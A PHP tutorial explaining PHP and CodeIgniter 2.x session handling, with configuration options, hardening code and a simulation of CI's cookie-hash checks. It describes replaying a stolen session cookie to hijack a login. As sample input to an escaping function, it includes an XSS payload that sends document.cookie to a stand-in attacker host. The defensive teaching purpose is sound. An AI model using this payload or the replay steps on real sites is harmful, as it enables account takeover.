
CodeIgniter configuration SESSION usage example analysis, session usage example_PHP tutorial

WBOY
2016-07-12 09:00:25


This article walks through how SESSION is configured and used in CodeIgniter. It is shared for your reference; the details are as follows:

When I first started using CodeIgniter, I was confused by its SESSION, and afterwards I never used the one that comes with CI. Still, it is worth sorting SESSION out properly. To understand SESSION in CI, let's first look at how SESSION works in PHP. HTTP itself is stateless, so to retain a user's access state across requests the client must pass the server a unique identifier. That identifier is the SESSION ID; it is stored in a cookie on the client, and on each request the server uses it to look up the user state it has stored, which is how the session is preserved. To start a session in PHP, execute:

session_start();

1. Every request the client makes carries a set of HTTP headers. On the user's first visit there is no cookie yet:

Request Headers
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding:gzip,deflate,sdch
Accept-Language:zh-CN,zh;q=0.8
Cache-Control:max-age=0
Connection:keep-alive
Host:s.local
User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36

2. The server processes the request and, in its HTTP response, includes a Set-Cookie header telling the browser to store a cookie. The cookie is named PHPSESSID and its value is r887k5n4scg32d4ba34huuhmq7:

Response Headers
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection:Keep-Alive
Content-Length:0
Content-Type:text/html
Date:Sun, 08 Dec 2013 12:56:56 GMT
Expires:Thu, 19 Nov 1981 08:52:00 GMT
Keep-Alive:timeout=5, max=100
Pragma:no-cache
Server:Apache/2.2.11 (Win32) PHP/5.4.7
Set-Cookie:PHPSESSID=r887k5n4scg32d4ba34huuhmq7; path=/
X-Powered-By:PHP/5.4.7

3. When the client visits another page of the site, the browser sends the cookie back. The server uses the cookie's value to locate the session file it stored and reads the session data from it:

Request Headers
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding:gzip,deflate,sdch
Accept-Language:zh-CN,zh;q=0.8
Cache-Control:max-age=0
Connection:keep-alive
Cookie:PHPSESSID=r887k5n4scg32d4ba34huuhmq7
Host:s.local
User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63

This is how session state survives across stateless requests. But consider what happens if someone obtains the SESSION ID of a logged-in user A. Following the logic above, if that SESSION ID is sent with a request, the server looks up the corresponding session file, finds valid data, and treats the request as coming from user A. The attacker therefore inherits A's logged-in state and can perform whatever sensitive operations A is authorised for. Within the session's validity period, possession of the SESSION ID is equivalent to possession of the user's authorisation, which makes it a dangerous value to leak. Taking a local management system as an example, after logging in through Chrome the client cookie can be inspected in the browser's developer tools:

If you obtain the SESSION ID by some means, you can replay the same cookie and be logged in without ever supplying credentials. A cookie can be added manually in Firefox: open Firebug, create a new cookie under the Cookies tab with the stolen name and value, then refresh the page, and the management system treats you as the logged-in user.
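The replay attack just described works because the cookie is the only thing the server checks. As an added example (not code from the original article), the following PHP snippet hardens a native PHP session against the two ways that cookie usually leaks: it keeps PHPSESSID out of JavaScript's reach with HttpOnly and Secure, refuses to adopt a SESSION ID the server did not issue (use_strict_mode), rotates the ID at login so a value captured before authentication is worthless afterwards, enforces an idle timeout on the server side, and escapes user data on output so injected script cannot run. The helper names (startHardenedSession, loginUser, sessionIsFresh, e) and the sample form input are constructed for the example; it assumes PHP 7.3 or later and a site served over HTTPS.

```php
<?php
// Added example, not the article's code: hardening PHP's native session
// against cookie theft and replay. Assumes PHP >= 7.3 and HTTPS.
declare(strict_types=1);

// 1. Cookie attributes: HttpOnly keeps PHPSESSID out of document.cookie,
//    Secure stops it being sent over plain HTTP, SameSite limits cross-site sends.
function startHardenedSession(): void
{
    if (session_status() === PHP_SESSION_ACTIVE) {
        return;
    }
    session_set_cookie_params([
        'lifetime' => 0,      // session cookie: discarded when the browser closes
        'path'     => '/',
        'domain'   => '',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
    // Only accept IDs this server issued; a guessed or planted PHPSESSID is not adopted
    ini_set('session.use_strict_mode', '1');
    ini_set('session.use_only_cookies', '1');
    session_start();
}

// 2. At login, replace the SESSION ID so anything captured before
//    authentication (session fixation) no longer maps to the logged-in session.
function loginUser(int $userId): void
{
    session_regenerate_id(true);   // true = delete the old session file as well
    $_SESSION['user_id']   = $userId;
    $_SESSION['logged_in'] = time();
}

// 3. Server-side idle timeout, independent of whatever lifetime the client claims.
function sessionIsFresh(int $maxIdleSeconds = 7200): bool
{
    if (!isset($_SESSION['last_seen'])) {
        $_SESSION['last_seen'] = time();
        return true;
    }
    if (time() - $_SESSION['last_seen'] > $maxIdleSeconds) {
        session_unset();
        session_destroy();
        return false;
    }
    $_SESSION['last_seen'] = time();
    return true;
}

// 4. Output escaping: user data echoed into HTML must not become script,
//    otherwise a cookie without HttpOnly is one XSS away from being stolen.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

startHardenedSession();
if (!sessionIsFresh()) {
    header('Location: /login');
    exit;
}
loginUser(42);

// Constructed sample input standing in for a submitted form field
$username = '<script>location="http://evil.example/?c="+document.cookie</script>';
echo 'Hello, ' . e($username) . PHP_EOL;   // the script tag is rendered as text, not executed
```

HttpOnly does not stop an attacker who already holds the cookie from replaying it, which is why the rotation at login and the server-side timeout matter as much as the cookie flags: they shrink the window in which a stolen SESSION ID is useful.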

Cookies are normally readable from JavaScript (document.cookie), so any user-supplied data rendered into a page must be escaped to stop injected script from running and sending the session cookie elsewhere; marking the session cookie HttpOnly, so the browser withholds it from script, is the other half of that defence. Next, take a look at SESSION in CI. Several parameters in the configuration file relate to the session and affect how it behaves:

// name of the cookie the session is stored in
$config['sess_cookie_name'] = 'ci_session';
// how long the session stays valid, in seconds
$config['sess_expiration'] = 7200;
// whether the session expires when the browser is closed
$config['sess_expire_on_close'] = FALSE;
// whether the session data is encrypted before being stored in the cookie
$config['sess_encrypt_cookie'] = FALSE;
// whether session data is also stored in the database
$config['sess_use_database']  = FALSE;
// table name to use when the database is enabled
$config['sess_table_name'] = 'ci_sessions';
// whether to check that the client IP matches the one stored in the session
$config['sess_match_ip']  = FALSE;
// whether to check that the User-Agent matches the one stored in the session
$config['sess_match_useragent'] = TRUE;
// interval, in seconds, after which the session ID is regenerated and last_activity refreshed
$config['sess_time_to_update'] = 300;

The SESSION that comes with CI (the 2.x series shown here) does not store anything in files on the server; all of the information lives in the client's cookie. When $this->load->library('session'); is called, a session is started, that is, a cookie is set. Decoded, the cookie's content looks like this:

Array
(
[session_id] => f05138a9513e4928cb0a57672cfe3b53
[ip_address] => 127.0.0.1
[user_agent] => Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
[last_activity] => 1386569398
[user_data] =>
)

On every request this information travels to the server in the HTTP Cookie header, and the server reconstructs the session from it. That is also a valid way to implement a session, but the approach has a number of uncertain factors. A few points, based on the source code:

1. If the log file contains: The session cookie data did not match what was expected. This could be a possible hacking attempt. This tells you two things: a. sess_encrypt_cookie is FALSE, so the session data sits in the cookie unencrypted and is protected only by the hash CI appends to it (the message is logged on that code path); b. after reading the cookie, that hash check failed, meaning the cookie data was altered or the encryption_key changed. Wherever encryption, decryption and parameter handling are involved it is easy to end up with a mismatch, and whenever the check fails the SESSION is cleared.

2. If sess_match_ip is TRUE, then when the client's IP changes the SESSION fails verification and is cleared.

3. sess_match_useragent defaults to TRUE. When the client's User-Agent changes, verification fails and the SESSION is cleared. A simple example is Internet Explorer: switching it into a different document or compatibility mode changes the User-Agent string, so verification fails and the SESSION is cleared.

As you can see, when any of the above happens the SESSION is cleared, the login is lost and the user is sent back to the login page. What if you turn off encryption and the IP and User-Agent checks? The cookie still has to be sent by the client with every HTTP request, including requests for static resources such as images where it is pure wasted bandwidth, and a large cookie slows every request. Cookies are also limited to about 4 KB, and once the data is encrypted the overhead leaves even less usable space.
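To make the three failure cases above reproducible offline, here is an added, stand-alone model of how CI 2.x's cookie-only session is built and checked. This is not CodeIgniter's code: the function names (buildSessionCookie, readSessionCookie), the constants standing in for the $config values, and the sample cookies are constructed for the example, and where CI appends md5($data . $encryption_key) to the serialized data, the example uses hash_hmac('sha256') with a constant-time hash_equals() comparison, which is what a practitioner should reach for today. It assumes PHP 7.1 or later.

```php
<?php
// Added example, not CI's code: a simplified model of CodeIgniter 2.x's
// cookie-only Session library, enough to reproduce its failure cases.
// Deliberate difference from CI: HMAC-SHA256 + hash_equals() instead of
// CI's md5($data . $key) suffix and plain !== comparison.
declare(strict_types=1);

const SESS_EXPIRATION = 7200;   // stands in for $config['sess_expiration']
const SESS_MATCH_IP   = false;  // stands in for $config['sess_match_ip']
const SESS_MATCH_UA   = true;   // stands in for $config['sess_match_useragent']
const ENCRYPTION_KEY  = 'constructed-demo-key-replace-in-real-use'; // $config['encryption_key']

// Serialize the session array and append a keyed hash (sess_encrypt_cookie = FALSE path).
function buildSessionCookie(array $session, string $key = ENCRYPTION_KEY): string
{
    $data = serialize($session);
    return $data . hash_hmac('sha256', $data, $key);
}

// Returns the session array, or null with $reason set, when the cookie must be
// discarded. Each null outcome corresponds to one of the cases the article lists.
function readSessionCookie(string $cookie, string $clientIp, string $clientUa, int $now,
                           ?string &$reason = null, string $key = ENCRYPTION_KEY): ?array
{
    $hashLen = 64;  // hex-encoded SHA-256
    if (strlen($cookie) <= $hashLen) {
        $reason = 'cookie too short';
        return null;
    }
    $data = substr($cookie, 0, -$hashLen);
    $hash = substr($cookie, -$hashLen);
    if (!hash_equals(hash_hmac('sha256', $data, $key), $hash)) {
        // This is where CI logs "The session cookie data did not match what was expected..."
        $reason = 'hash mismatch (tampered cookie or changed key)';
        return null;
    }
    $session = @unserialize($data, ['allowed_classes' => false]);
    if (!is_array($session)
        || !isset($session['session_id'], $session['ip_address'], $session['user_agent'], $session['last_activity'])) {
        $reason = 'malformed session payload';
        return null;
    }
    if ($session['last_activity'] + SESS_EXPIRATION < $now) {
        $reason = 'expired';
        return null;
    }
    if (SESS_MATCH_IP && $session['ip_address'] !== $clientIp) {
        $reason = 'ip changed';
        return null;
    }
    // CI stores and compares only the first 120 characters of the User-Agent
    if (SESS_MATCH_UA && $session['user_agent'] !== trim(substr($clientUa, 0, 120))) {
        $reason = 'user agent changed';
        return null;
    }
    $reason = null;
    return $session;
}

// Constructed walk-through: one valid cookie, then the failure cases.
$ua  = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36';
$now = 1386569398;
$cookie = buildSessionCookie([
    'session_id'    => bin2hex(random_bytes(16)),
    'ip_address'    => '127.0.0.1',
    'user_agent'    => trim(substr($ua, 0, 120)),
    'last_activity' => $now,
    'user_data'     => serialize(['user_id' => 42]),
]);

$cases = [
    'valid'      => [$cookie, '127.0.0.1', $ua, $now + 60],
    'tampered'   => [str_replace('127.0.0.1', '10.0.0.9', $cookie), '127.0.0.1', $ua, $now + 60],
    'ua changed' => [$cookie, '127.0.0.1', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)', $now + 60],
    'expired'    => [$cookie, '127.0.0.1', $ua, $now + SESS_EXPIRATION + 1],
];
foreach ($cases as $label => [$c, $ip, $agent, $t]) {
    $session = readSessionCookie($c, $ip, $agent, $t, $reason);
    printf("%-10s => %s\n", $label, $session !== null ? 'accepted' : "cleared ({$reason})");
}
```

Run it and only the first case is accepted; the other three are cleared with the reason shown. The "tampered" case is the one that produces the "possible hacking attempt" log line in CI: the payload was edited but the hash was not recomputed, which is exactly what the appended hash exists to catch. It also shows why the client-side design is fragile: the legitimate user's cookie is cleared for the very same reasons whenever a proxy rewrites the User-Agent or the encryption_key is rotated.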

These uncertain factors produce all kinds of strange problems. Rather than get tangled up in them, it is simpler to switch decisively to another session method, for example enabling sess_use_database so the data lives in the ci_sessions table, or using PHP's native file-based sessions described at the start.

Readers who are interested in more content related to the CodeIgniter framework can check out the special topic on this site: "Introduction to codeigniter tutorial"

I hope this article will be helpful to everyone’s PHP program design based on the CodeIgniter framework.

